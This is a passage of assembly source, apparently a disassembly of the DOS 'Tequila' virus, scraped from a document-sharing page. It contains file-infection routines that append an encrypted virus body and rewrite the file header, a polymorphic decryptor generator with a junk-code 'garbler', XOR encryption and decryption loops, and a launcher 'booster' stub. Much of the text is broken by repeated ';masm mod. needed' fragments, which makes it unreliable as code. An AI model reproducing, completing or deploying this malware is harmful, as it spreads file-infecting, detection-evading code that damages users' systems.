jb ret ;masm cmp w[0a65],0fdf0 jne 07f0 cmp w[0a67],0aac5 jne 07f0 mov cx,-1 mov dx,-9 call 06a8 mov dx,0a6b mov cx,4 call 0696 ret clc ret
mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
encrypt_and_write_to_file: call move_to_end_of_file mov si,ax mov di,dx mov bx,0a49 mov ax,w[bx+4] mul w[0d] ;masm mod. needed sub ax,si sbb dx,di jae 080c ;masm mod. needed jmp out_of_encrypt mov ax,w[bx+8] mul w[0b] ;masm mod. needed sub si,ax sbb di,dx mov ax,w[bx+0e] mov w[4],ax ;masm mod. needed add w[4],010 ;masm mod. needed mul w[0b] ;masm mod. needed add ax,w[bx+010] sub ax,si sbb dx,di jb 083c ;masm mod. needed sub ax,080 sbb dx,0 jb ret ;masm mod. needed add w[bx+0e],09b mov ax,w[bx+016] add ax,010 mov w[2],ax ;masm mod. needed mov ax,w[bx+014] mov w[0],ax ;masm mod. needed call 06a4 ;masm mod. needed add ax,09a4 adc dx,0 div w[0d] ;masm mod. needed inc ax mov w[0a4d],ax ;masm mod. needed mov w[0a4b],dx ;masm mod. needed mov dx,di mov ax,si div w[0b] ;masm mod. needed mov w[0a5f],ax ;masm mod. needed
mov bx,dx add dx,0960 mov w[0a5d],dx ;masm mod. needed call copy_to_high_memory_encrypt_write jb ret ;masm mod. needed or w[09ae],01f ;masm mod. needed mov bx,w[09bc] and bx,01f shl bx,1 mov ax,w[bx+0e8] mov w[0a5b],ax ;masm mod. needed call move_to_beginning_of_file mov cx,01c mov dx,0a49 write_the_new_header: call 0696 out_of_encrypt: ret
;masm mod. needed
copy_to_high_memory_encrypt_write: push bp xor ah,ah int 01a mov ax,dx mov bp,dx push ds pop es mov di,0960 mov si,di mov cx,020 cld rep stosw xor dx,dx mov es,dx call encrypt_step_one call encrypt_step_two call encrypt_step_three mov b[si],0e9 mov di,028c sub di,si sub di,3 inc si mov w[si],di mov ax,0a04 call ax pop bp ret encrypt_step_one: dec bp es test b[bp],2 jne 08eb mov b[si],0e inc si call garbler mov b[si],01f inc si
;masm mod. needed ;masm mod. needed
call garbler ret mov w[si],0cb8c inc si inc si call garbler mov w[si],0db8e inc si inc si call garbler ret encrypt_step_two: and ch,0fe dec bp es test b[bp],2 ;masm mod. needed je 0920 ;masm mod. needed or ch,1 mov b[si],0be inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 0934 ;masm mod. needed mov b[si],0bb inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 090c ;masm mod. needed sub bx,0960 call garbler mov b[si],0b9 inc si mov ax,0960 mov w[si],ax inc si inc si call garbler call garbler ret encrypt_step_three: mov ah,014 mov dh,017 test ch,1 je 0958 ;masm mod. needed xchg dh,ah mov di,si mov al,08a mov w[si],ax inc si
inc si call garbler xor dl,dl mov b[0a39],028 ;masm mod. needed dec bp es test b[bp],2 ;masm mod. needed je 0978 ;masm mod. needed mov dl,030 mov b[0a39],dl ;masm mod. needed mov w[si],dx inc si inc si mov w[si],04346 inc si inc si call garbler mov ax,0fe81 mov cl,0be test ch,1 je 0993 ;masm mod. needed mov ah,0fb mov cl,0bb mov w[si],ax inc si inc si push bx add bx,040 mov w[si],bx inc si inc si pop bx mov b[si],072 inc si mov dx,si inc si call garbler mov b[si],cl inc si mov w[si],bx inc si inc si mov ax,si sub ax,dx dec ax mov bx,dx mov b[bx],al call garbler call garbler mov b[si],0e2 inc si sub di,si dec di mov ax,di mov b[si],al inc si call garbler ret
garbler: dec bp es test b[bp],0f je ret ;masm dec bp es mov al,b[bp] test al,2 je 0a0e ;masm test al,4 je 09f7 ;masm test al,8 je 09f1 ;masm mov w[si],0c789 inc si inc si jmp ret ;masm mov b[si],090 inc si jmp ret ;masm mov al,085 dec bp es mov ah,b[bp] test ah,2 je 0a05 ;masm dec al or ah,0c0 mov w[si],ax inc si inc si jmp ret ;masm dec bp es test b[bp],2 je 0a1a ;masm mov al,039 jmp 09f9 mov b[si],0fc inc si ret
;masm mod. needed mod. needed ;masm mod. needed mod. needed mod. needed mod. needed
mod. needed mod. needed ;masm mod. needed mod. needed
mod. needed ;masm mod. needed mod. needed ;masm mod. needed
make_the_disk_write: call perform_encryption_decryption mov ah,040 mov bx,w[09a4] mov dx,0 mov cx,09a4 pushf call d[09b4] ;masm mod. needed jb 0a37 ;masm mod. needed sub ax,cx pushf cmp b[0a39],028 ;masm mod. needed jne 0a44 ;masm mod. needed mov b[0a39],0 ;masm mod. needed call perform_encryption_decryption popf ret perform_encryption_decryption:
mov bx,0 mov si,0960 mov cx,0960 mov dl,b[si] xor b[bx],dl inc si inc bx cmp si,09a0 jb 0a61 mov si,0960 loop 0a52 ret
;masm mod. needed ;masm mod. needed
the_file_decrypting_routine: push cs pop ds mov bx,4 mov si,0964 mov cx,0960 mov dl,b[si] add b[bx],dl inc si inc bx cmp si,09a4 jb 0a7e ;masm mod. needed mov si,0964 loop 0a6f ;masm mod. needed jmp 0390 ;masm mod. needed ;========== the following is not part of the virus ======== ;========== but is merely the booster. ======== start: lea mov mov sub jmp
w[0104],exit w[0106],cs bx,cs w[0106],bx install
exit: int 020 tequila endp code_seg ends end tequila
;masm mod. needed ;masm mod. needed ;masm mod. needed
Related Documents
Tequila
November 2019 10
Tequila
November 2019 17
Tequila
May 2020 11
Tequila Terroir
April 2020 4
Tequila Party
October 2019 19